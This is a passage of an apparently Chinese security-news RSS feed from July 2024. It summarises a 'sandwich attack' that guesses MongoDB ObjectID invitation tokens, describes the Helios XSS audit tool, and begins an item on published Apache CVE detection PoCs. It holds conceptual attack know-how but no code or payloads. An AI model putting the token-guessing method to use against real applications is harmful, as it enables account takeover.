		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 新型的三明治攻击应用场景</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文介绍了一种新的利用场景，即在不知道时间戳的情况下，通过监控和猜测 MongoDB Object ID 格式的邀请令牌来实现攻击。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" data-w="1024" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=9041ba42&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbick962wX1rNJKRWWXK5v3xwMJiaXeGpj79bajCkUFicHZXbnRxaTG5RTSA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.47257383966244726" data-w="948" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=90aa359e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicqw20ksMRGr5Cv8uWc6owlPOEwwUxDQOX79L7ZTFK4phGMdsGF0aSFg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.16561844863731656" data-w="477" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=ae89270b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbic9GM74RITAeqSI43FJqe6FM1fuyicyQIYjia3oh0SoeMNujBpiaXwpuzkA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">时间型密钥新应用：实时监控 Web 应用邀请</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicJYpvjicdf9PFvcUFzQjUjQqD43NnU6QUuGsbysniboIXQicOYzSqXPIaQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicJYpvjicdf9PFvcUFzQjUjQqD43NnU6QUuGsbysniboIXQicOYzSqXPIaQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844212585548418"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">时间戳和计数器的重要性：MongoDB Object ID 由时间戳、进程和计数器组成，这些信息对于实施三明治攻击至关重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">长时间段的攻击不切实际：长时间段的三明治攻击需要高速验证大量令牌，这在现实中不太可行。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">短时间段的优势：通过使用多个短时间段，可以显著减少需要猜测的令牌总数，从而提高攻击的可行性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">计数器监控的作用：通过监控计数器的变化，攻击者可以更有效地检测新令牌的生成，并优化请求数量。</section></li></ul>
	<br/>
	<p>🏷️: 攻击, MongoDB, 安全漏洞, 时间戳</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 Helios：自动化XSS审计工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Helios 是一个自动化的跨站脚本（XSS）审计工具，支持多种浏览器，能够对 URL 参数、POST 参数、头部信息和 DOM 内容进行全面扫描，检测 XSS 漏洞，并提供详细的报告功能。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1.1622678396871946" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1023" src="https://wechat2rss.xlab.app/img-proxy/?k=25d22f2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicg1wrO3UAFX4lO2iaCmiaQ1BgEajicV2WGBbRD9Oia1GicspM6mq4AHYXPGA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.847457627118644" data-w="1003" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=875c460e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicicWQ5nSshSKgWb8oTB43GhNTuc3xE3EzCxuBICZP9nZXLSryDib93luQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5222222222222223" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=55b77303&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbictvPqRSH42C9ydafBwvicgv8JMicdVnqZ0eqRl5E69s2u43vwk3XjF6lQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Helios：自动化跨站脚本 (XSS) 测试工具</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Helios: 自动化跨站脚本 (XSS) 漏洞审计工具</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicia2GLv9snymG8QJNl8Pzy1zLyibr1vU2CwBb0C2mZ9g9mRs85MIPicZiag/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicia2GLv9snymG8QJNl8Pzy1zLyibr1vU2CwBb0C2mZ9g9mRs85MIPicZiag/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855414282284841"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Helios 是一个针对 XSS 漏洞的自动化审计工具，它提供了一系列高级功能，如多浏览器支持、无界面模式、多线程并发扫描、自定义配置和爬虫功能，以及详细的报告输出。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">工具强调对 DOM-Based XSS 漏洞的检测，并通过自动化的 payload 定制提高了检测的准确性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Helios 目前正在积极开发中，虽然已经具备了强大的扫描能力，但仍然处于早期阶段，可能存在不稳定性和局限性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">开发者鼓励社区的参与和反馈，以帮助改进工具，并在未来版本中提供更多的功能和性能优化。</section></li></ul>
	<br/>
	<p>🏷️: XSS, 自动化审计, 网络安全, 浏览器支持, 多线程扫描</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.5548387096774194" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=991c0b7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3nwksKq8ZBqrghjtia9TYiblaxU2VXrUpDcAM57Ric0wX9pBg69IusWVyg%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487643">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=665410bb&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487643%26idx%3D1%26sn%3D64eb3611770faf3c620745406fe40822%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 22 Jul 2024 09:09:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0721 | apache2个检测poc公开</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487637&amp;idx=1&amp;sn=6229121098df1fb61d8329fd41691f72</link>
      <description>GitHub 上的一个仓库披露了两个Apache漏洞（CVE-2024-40725 和 CVE-2024-40898），这可能导致源代码泄露和服务器端请求伪造（SSRF）攻击。</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-07-21 09:47</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>GitHub 上的一个仓库披露了两个Apache漏洞（CVE-2024-40725 和 CVE-2024-40898），这可能导致源代码泄露和服务器端请求伪造（SSRF）攻击。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=1c8fc364&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZn2p6s1XVfMoaQYTCUPYkXJBUCPGefmOycYMzZyxcaQWLNDwd41iaF5vZibkdGSOoc94jYP0sBJWxYA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-07-21 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: 